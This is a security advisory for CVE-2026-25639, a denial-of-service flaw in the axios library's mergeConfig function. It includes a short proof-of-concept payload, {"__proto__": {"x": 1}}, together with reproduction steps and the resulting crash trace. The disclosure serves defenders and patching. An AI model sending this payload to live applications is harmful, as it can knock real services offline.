CVE-2026-25639

ADVISORY - github

Summary

Denial of Service via proto Key in mergeConfig

Summary

The mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.

Details

The vulnerability exists in lib/core/mergeConfig.js at lines 98-101:

utils.forEach(Object.keys({ ...config1, ...config2 }), function computeConfigValue(prop) {
  const merge = mergeMap[prop] || mergeDeepProperties;
  const configValue = merge(config1[prop], config2[prop], prop);
  (utils.isUndefined(configValue) && merge !== mergeDirectKeys) || (config[prop] = configValue);
});

When prop is '__proto__':

  1. JSON.parse('{"__proto__": {...}}') creates an object with __proto__ as an own enumerable property
  2. Object.keys() includes '__proto__' in the iteration
  3. mergeMap['__proto__'] performs prototype chain lookup, returning Object.prototype (truthy object)
  4. The expression mergeMap[prop] || mergeDeepProperties evaluates to Object.prototype
  5. Object.prototype(...) throws TypeError: merge is not a function

The mergeConfig function is called by:

  • Axios._request() at lib/core/Axios.js:75
  • Axios.getUri() at lib/core/Axios.js:201
  • All HTTP method shortcuts (get, post, etc.) at lib/core/Axios.js:211,224

PoC

import axios from "axios";

const maliciousConfig = JSON.parse('{"__proto__": {"x": 1}}');
await axios.get("https://httpbin.org/get", maliciousConfig);

Reproduction steps:

  1. Clone axios repository or npm install axios
  2. Create file poc.mjs with the code above
  3. Run: node poc.mjs
  4. Observe the TypeError crash

Verified output (axios 1.13.4):

TypeError: merge is not a function
    at computeConfigValue (lib/core/mergeConfig.js:100:25)
    at Object.forEach (lib/utils.js:280:10)
    at mergeConfig (lib/core/mergeConfig.js:98:9)

Control tests performed:

Test Config Result
Normal config {"timeout": 5000} SUCCESS
Malicious config JSON.parse('{"__proto__": {"x": 1}}') CRASH
Nested object {"headers": {"X-Test": "value"}} SUCCESS

Attack scenario: An application that accepts user input, parses it with JSON.parse(), and passes it to axios configuration will crash when receiving the payload {"__proto__": {"x": 1}}.

Impact

Denial of Service - Any application using axios that processes user-controlled JSON and passes it to axios configuration methods is vulnerable. The application will crash when processing the malicious payload.

Affected environments:

  • Node.js servers using axios for HTTP requests
  • Any backend that passes parsed JSON to axios configuration

This is NOT prototype pollution - the application crashes before any assignment occurs.

Common Weakness Enumeration (CWE)

ADVISORY - nist

Improper Check for Unusual or Exceptional Conditions

ADVISORY - github

Improper Check for Unusual or Exceptional Conditions


GitHub

CREATED

UPDATED

EXPLOITABILITY SCORE

3.9

EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)

CVSS SCORE

7.5high
PackageTypeOS NameOS VersionAffected RangesFix Versions
axiosnpm--<=1.13.41.13.5

CVSS:3 Severity and metrics

The CVSS metrics represent different qualitative aspects of a vulnerability that impact the overall score, as defined by the CVSS Specification.

The vulnerable component is bound to the network stack, but the attack is limited at the protocol level to a logically adjacent topology. This can mean an attack must be launched from the same shared physical (e.g., Bluetooth or IEEE 802.11) or logical (e.g., local IP subnet) network, or from within a secure or otherwise limited administrative domain (e.g., MPLS, secure VPN to an administrative network zone). One example of an Adjacent attack would be an ARP (IPv4) or neighbor discovery (IPv6) flood leading to a denial of service on the local LAN segment (e.g., CVE-2013-6014).

Specialized access conditions or extenuating circumstances do not exist. An attacker can expect repeatable success when attacking the vulnerable component.

The attacker is unauthorized prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.

The vulnerable system can be exploited without interaction from any user.

An exploited vulnerability can only affect resources managed by the same security authority. In this case, the vulnerable component and the impacted component are either the same, or both are managed by the same security authority.

There is no loss of confidentiality.

There is no loss of trust or accuracy within the impacted component.

There is a total loss of availability, resulting in the attacker being able to fully deny access to resources in the impacted component; this loss is either sustained (while the attacker continues to deliver the attack) or persistent (the condition persists even after the attack has completed). Alternatively, the attacker has the ability to deny some availability, but the loss of availability presents a direct, serious consequence to the impacted component.

NIST

CREATED

UPDATED

EXPLOITABILITY SCORE

3.9

EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)

CVSS SCORE

7.5high

minimos

CREATED

UPDATED

ADVISORY ID

MINI-qhx4-65m4-w82c

EXPLOITABILITY SCORE

-

EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)-
RATING UNAVAILABLE FROM ADVISORY

minimos

CREATED

UPDATED

ADVISORY ID

MINI-r9f6-4jpp-r2p2

EXPLOITABILITY SCORE

-

EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)-
RATING UNAVAILABLE FROM ADVISORY